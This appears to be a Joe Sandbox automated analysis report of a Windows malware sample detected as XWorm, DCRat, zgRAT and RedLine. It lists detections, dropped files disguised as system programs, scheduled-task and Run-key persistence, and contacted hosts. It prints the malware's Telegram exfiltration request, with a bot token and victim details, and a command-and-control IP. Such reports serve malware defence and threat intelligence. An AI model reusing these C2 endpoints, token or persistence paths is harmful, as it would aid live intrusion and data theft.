                                    Source: Yara matchFile source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: HaLCYOFjMN.exe PID: 720, type: MEMORYSTR
                                    Yara detected XWorm
                                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                    Source: Yara matchFile source: HaLCYOFjMN.exe, type: SAMPLE
                                    Source: Yara matchFile source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.2734936969.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.2734936969.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: HaLCYOFjMN.exe PID: 720, type: MEMORYSTR
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.73bc6d7.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.6aa46d7.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.6aa46d7.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 33.0.portBrowserweb.exe.3e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.73bc6d7.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\agentwebreviewDhcp\portBrowserweb.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows Mail\System.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\agentwebreviewDhcp\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rqbprm.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts221
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		11
                                    Disable or Modify Tools                                    		11
                                    Input Capture                                    		1
                                    System Time Discovery                                    		1
                                    Taint Shared Content                                    		11
                                    Archive Collected Data                                    		1
                                    Web Service                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter                                    		1
                                    DLL Side-Loading                                    		12
                                    Process Injection                                    		11
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory3
                                    File and Directory Discovery                                    		Remote Desktop Protocol1
                                    Screen Capture                                    		1
                                    Ingress Tool Transfer                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Scheduled Task/Job                                    		1
                                    Scheduled Task/Job                                    		1
                                    Scheduled Task/Job                                    		3
                                    Obfuscated Files or Information                                    		Security Account Manager57
                                    System Information Discovery                                    		SMB/Windows Admin Shares11
                                    Input Capture                                    		11
                                    Encrypted Channel                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts1
                                    PowerShell                                    		31
                                    Registry Run Keys / Startup Folder                                    		31
                                    Registry Run Keys / Startup Folder                                    		21
                                    Software Packing                                    		NTDS571
                                    Security Software Discovery                                    		Distributed Component Object ModelInput Capture1
                                    Non-Standard Port                                    		Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    Timestomp                                    		LSA Secrets2
                                    Process Discovery                                    		SSHKeylogging2
                                    Non-Application Layer Protocol                                    		Scheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                    DLL Side-Loading                                    		Cached Domain Credentials161
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input Capture13
                                    Application Layer Protocol                                    		Data Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                    File Deletion                                    		DCSync1
                                    Application Window Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job33
                                    Masquerading                                    		Proc Filesystem1
                                    System Network Configuration Discovery                                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt161
                                    Virtualization/Sandbox Evasion                                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                                    Process Injection                                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585491 Sample: HaLCYOFjMN.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 98 api.telegram.org 2->98 100 122295cm.n9shteam.in 2->100 102 ip-api.com 2->102 114 Suricata IDS alerts for network traffic 2->114 116 Found malware configuration 2->116 118 Malicious sample detected (through community Yara rule) 2->118 122 26 other signatures 2->122 12 HaLCYOFjMN.exe 15 7 2->12         started        17 Update.exe 2->17         started        19 svchost.exe 2->19         started        21 5 other processes 2->21 signatures3 120 Uses the Telegram API (likely for C&C communication) 98->120 process4 dnsIp5 104 94.141.122.161, 49976, 49982, 7000 UNITLINE_RST_NET1RostovnaDonuRU Russian Federation 12->104 106 ip-api.com 208.95.112.1, 49699, 80 TUT-ASUS United States 12->106 108 api.telegram.org 149.154.167.220, 443, 49975 TELEGRAMRU United Kingdom 12->108 92 C:\Users\user\AppData\Roaming\Update.exe, PE32 12->92 dropped 94 C:\Users\user\AppData\Local\Temp\rqbprm.exe, PE32 12->94 dropped 96 C:\Users\user\AppData\Local\Temp\cnvwov.EXE, PE32 12->96 dropped 146 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->146 148 Protects its processes via BreakOnTermination flag 12->148 150 Creates multiple autostart registry keys 12->150 154 5 other signatures 12->154 23 rqbprm.exe 12->23         started        27 cnvwov.EXE 12->27         started        29 powershell.exe 23 12->29         started        31 4 other processes 12->31 152 Machine Learning detection for dropped file 17->152 110 127.0.0.1 unknown unknown 19->110 file6 signatures7 process8 file9 86 C:\agentwebreviewDhcp\portBrowserweb.exe, PE32 23->86 dropped 132 Antivirus detection for dropped file 23->132 134 Multi AV Scanner detection for dropped file 23->134 136 Machine Learning detection for dropped file 23->136 33 wscript.exe 23->33         started        138 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 27->138 140 Reads the System eventlog 27->140 36 conhost.exe 27->36         started        142 Loading BitLocker PowerShell Module 29->142 38 conhost.exe 29->38         started        40 conhost.exe 31->40         started        42 conhost.exe 31->42         started        44 conhost.exe 31->44         started        46 conhost.exe 31->46         started        signatures10 process11 signatures12 112 Windows Scripting host queries suspicious COM object (likely to drop second stage) 33->112 48 cmd.exe 33->48         started        process13 process14 50 portBrowserweb.exe 48->50         started        54 conhost.exe 48->54         started        file15 78 C:\agentwebreviewDhcp\WmiPrvSE.exe, PE32 50->78 dropped 80 C:\Windows\SystemApps\...\Idle.exe, PE32 50->80 dropped 82 C:\Users\user\Desktop\zXoALCrI.log, PE32 50->82 dropped 84 18 other malicious files 50->84 dropped 124 Multi AV Scanner detection for dropped file 50->124 126 Creates an undocumented autostart registry key 50->126 128 Creates multiple autostart registry keys 50->128 130 2 other signatures 50->130 56 csc.exe 50->56         started        60 csc.exe 50->60         started        62 csc.exe 50->62         started        64 10 other processes 50->64 signatures16 process17 file18 88 C:\Program Files (x86)\...\msedge.exe, PE32 56->88 dropped 144 Infects executable files (exe, dll, sys, html) 56->144 66 conhost.exe 56->66         started        68 cvtres.exe 56->68         started        90 C:\Windows\...\SecurityHealthSystray.exe, PE32 60->90 dropped 70 conhost.exe 60->70         started        72 cvtres.exe 60->72         started        74 conhost.exe 62->74         started        76 cvtres.exe 62->76         started        signatures19 process20

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    HaLCYOFjMN.exe79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                                    HaLCYOFjMN.exe100%AviraTR/Spy.Gen
                                    HaLCYOFjMN.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\AppData\Local\Temp\jxseyegkwF.bat100%AviraBAT/Delbat.C
                                    C:\Program Files\Windows Mail\System.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\cnvwov.EXE100%AviraTR/Spy.RedLine.hgyva
                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\rqbprm.exe100%AviraVBS/Runner.VPG
                                    C:\Users\user\Desktop\IJgIaehv.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\AppData\Roaming\Update.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                                    C:\Program Files\Windows Mail\System.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Temp\rqbprm.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\IJgIaehv.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe65%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Windows Mail\System.exe65%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\AppData\Local\Temp\cnvwov.EXE68%ReversingLabsByteCode-MSIL.Ransomware.RedLine
                                    C:\Users\user\AppData\Local\Temp\rqbprm.exe74%ReversingLabsWin32.Trojan.Uztuby
                                    C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe65%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\IJgIaehv.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\MwyHCbxj.log25%ReversingLabs
                                    C:\Users\user\Desktop\RjQGfYMX.log5%ReversingLabs
                                    C:\Users\user\Desktop\WfRXmDCR.log8%ReversingLabs
                                    C:\Users\user\Desktop\cXuwPjHF.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\gOlnWgHy.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\hLMvsgWt.log8%ReversingLabs
                                    C:\Users\user\Desktop\mGNMzMMn.log17%ReversingLabs
                                    C:\Users\user\Desktop\nuSUkZIl.log25%ReversingLabs
                                    C:\Users\user\Desktop\poUkcZma.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\vphcjoRU.log9%ReversingLabs
                                    C:\Users\user\Desktop\yaMsqCcN.log12%ReversingLabs
                                    C:\Users\user\Desktop\zXoALCrI.log21%ReversingLabs
                                    C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe65%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\agentwebreviewDhcp\WmiPrvSE.exe65%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\agentwebreviewDhcp\portBrowserweb.exe65%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    https://api.ip.s0%Avira URL Cloudsafe
                                    http://crl.m)10%Avira URL Cloudsafe
                                    94.141.122.161:77710%Avira URL Cloudsafe
                                    94.141.122.1610%Avira URL Cloudsafe

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    122295cm.n9shteam.in
                                    		104.21.48.1
                                    		truetrue
                                      		unknown
                                      ip-api.com
                                      		208.95.112.1
                                      		truefalse
                                        		high
                                        api.telegram.org
                                        		149.154.167.220
                                        		truefalse
                                          		high

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          https://api.telegram.org/bot7568949165:AAGgQ5jLJjKDrnOV8dm-jnLIdWR-IOeUVTQ/sendMessage?chat_id=7733551555&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A23A5CC5CF533B5EED372%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ST_D6%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20nursultanfalse
                                            		high
                                            94.141.122.161:7771true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            94.141.122.161true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://ip-api.com/line/?fields=hostingfalse
                                              		high

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1374360304.00000291BC071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1480589224.000001A790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1671013301.0000025F20E5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.ip.sb/ipcnvwov.EXE, 00000019.00000002.2108078019.0000000002A28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.org/botHaLCYOFjMN.exefalse
                                                      		high
                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.1358832302.00000291AC229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1409156363.000001A780229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1556214929.0000025F11018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 0000000E.00000002.1698122440.0000025F29337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/Licensepowershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.micpowershell.exe, 0000000B.00000002.1510501771.000001A7EB190000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/Iconpowershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000001C.00000003.2101646208.0000027FE8E20000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.drfalse
                                                                    		high
                                                                    http://crl.ver)svchost.exe, 0000001C.00000002.2731978464.0000027FE9000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://api.ip.scnvwov.EXE, 00000019.00000002.2108078019.0000000002A28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://crl.m)1powershell.exe, 00000008.00000002.1382080691.00000291C4810000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://crl.mpowershell.exe, 0000000E.00000002.1699293862.0000025F293F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://g.live.com/odclientsettings/Prod1C:edb.log.28.drfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1358832302.00000291AC229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1409156363.000001A780229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1556214929.0000025F11018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://contoso.com/powershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1374360304.00000291BC071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1480589224.000001A790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1671013301.0000025F20E5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://discord.com/api/v9/users/cnvwov.EXE, 00000019.00000002.2108078019.0000000002AED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crl.micft.cMicRosofpowershell.exe, 0000000B.00000002.1510501771.000001A7EB190000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://aka.ms/pscore68powershell.exe, 00000008.00000002.1358832302.00000291AC001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1409156363.000001A780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1556214929.0000025F10DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1737986388.0000018880001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHaLCYOFjMN.exe, 00000005.00000002.2734936969.0000000002561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1358832302.00000291AC001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1409156363.000001A780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1556214929.0000025F10DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1737986388.0000018880001000.00000004.00000800.00020000.00000000.sdmp, portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://crl.microspowershell.exe, 0000000E.00000002.1694832376.0000025F2917E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high

                                                                                            World Map of Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public IPs

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            208.95.112.1
                                                                                            		ip-api.comUnited States
                                                                                            		53334TUT-ASUSfalse
                                                                                            149.154.167.220
                                                                                            		api.telegram.orgUnited Kingdom
                                                                                            		62041TELEGRAMRUfalse
                                                                                            94.141.122.161
                                                                                            		unknownRussian Federation
                                                                                            		43429UNITLINE_RST_NET1RostovnaDonuRUtrue

                                                                                            Private

                                                                                            IP
                                                                                            127.0.0.1

                                                                                            General Information

                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1585491
                                                                                            Start date and time:2025-01-07 18:01:07 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 10m 45s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:57
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:HaLCYOFjMN.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:3c30d3b3706b97a2a0638180bb159b44.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.spre.troj.spyw.expl.evad.winEXE@81/76@3/4
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 25%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 56%
                                                                                            • Number of executed functions: 301
                                                                                            • Number of non-executed functions: 81
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe

                                                                                            Warnings

                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 23.56.254.164, 13.107.246.45, 172.202.163.200
                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                            • Execution Graph export aborted for target Update.exe, PID 1416 because it is empty
                                                                                            • Execution Graph export aborted for target Update.exe, PID 1516 because it is empty
                                                                                            • Execution Graph export aborted for target Update.exe, PID 5820 because it is empty
                                                                                            • Execution Graph export aborted for target Update.exe, PID 7188 because it is empty
                                                                                            • Execution Graph export aborted for target portBrowserweb.exe, PID 7392 because it is empty
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 6768 because it is empty
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7352 because it is empty
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7692 because it is empty
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7912 because it is empty
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                            • VT rate limit hit for: HaLCYOFjMN.exe

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            12:02:09API Interceptor51x Sleep call for process: powershell.exe modified
                                                                                            13:14:41API Interceptor218173x Sleep call for process: HaLCYOFjMN.exe modified
                                                                                            13:14:55API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                            19:14:42Task SchedulerRun new task: Update path: C:\Users\user\AppData\Roaming\Update.exe
                                                                                            19:14:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Update C:\Users\user\AppData\Roaming\Update.exe
                                                                                            19:14:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Update C:\Users\user\AppData\Roaming\Update.exe
                                                                                            19:15:23Task SchedulerRun new task: System path: "C:\Program Files\Windows Mail\System.exe"
                                                                                            19:15:24Task SchedulerRun new task: SystemS path: "C:\Program Files\Windows Mail\System.exe"
                                                                                            19:15:29Task SchedulerRun new task: Idle path: "C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe"
                                                                                            19:15:29Task SchedulerRun new task: IdleI path: "C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe"
                                                                                            19:15:30Task SchedulerRun new task: portBrowserweb path: "C:\agentwebreviewDhcp\portBrowserweb.exe"
                                                                                            19:15:31Task SchedulerRun new task: portBrowserwebp path: "C:\agentwebreviewDhcp\portBrowserweb.exe"
                                                                                            19:15:31Task SchedulerRun new task: WmiPrvSE path: "C:\agentwebreviewDhcp\WmiPrvSE.exe"
                                                                                            19:15:32Task SchedulerRun new task: WmiPrvSEW path: "C:\agentwebreviewDhcp\WmiPrvSE.exe"
                                                                                            19:15:32Task SchedulerRun new task: ybWXCCKXKhIvlNpBF path: "C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe"
                                                                                            19:15:32Task SchedulerRun new task: ybWXCCKXKhIvlNpBFy path: "C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe"
                                                                                            19:15:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files\Windows Mail\System.exe"
                                                                                            19:15:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ybWXCCKXKhIvlNpBF "C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe"
                                                                                            19:15:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\agentwebreviewDhcp\WmiPrvSE.exe"
                                                                                            19:16:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe"

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            208.95.112.11.exeGet hashmaliciousUnknownBrowse
                                                                                            • ip-api.com/json/?fields=hosting,query
                                                                                            1.exeGet hashmaliciousUnknownBrowse
                                                                                            • ip-api.com/json/?fields=hosting,query
                                                                                            YPzNsfg4nR.exeGet hashmaliciousXWormBrowse
                                                                                            • ip-api.com/line/?fields=hosting
                                                                                            SAL987656700.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • ip-api.com/line/?fields=hosting
                                                                                            Resource.exeGet hashmaliciousBlank GrabberBrowse
                                                                                            • ip-api.com/json/?fields=225545
                                                                                            P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                                                                            • ip-api.com/line/?fields=hosting
                                                                                            BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                                                                            • ip-api.com/line/?fields=hosting
                                                                                            SharkHack.exeGet hashmaliciousXWormBrowse
                                                                                            • ip-api.com/line/?fields=hosting
                                                                                            paint.exeGet hashmaliciousBlank GrabberBrowse
                                                                                            • ip-api.com/json/?fields=225545
                                                                                            X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                            • ip-api.com/json/?fields=225545

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            ip-api.com1.exeGet hashmaliciousUnknownBrowse
                                                                                            • 208.95.112.1
                                                                                            1.exeGet hashmaliciousUnknownBrowse
                                                                                            • 208.95.112.1
                                                                                            YPzNsfg4nR.exeGet hashmaliciousXWormBrowse
                                                                                            • 208.95.112.1
                                                                                            SAL987656700.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.95.112.1
                                                                                            Resource.exeGet hashmaliciousBlank GrabberBrowse
                                                                                            • 208.95.112.1
                                                                                            P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                                                                            • 208.95.112.1
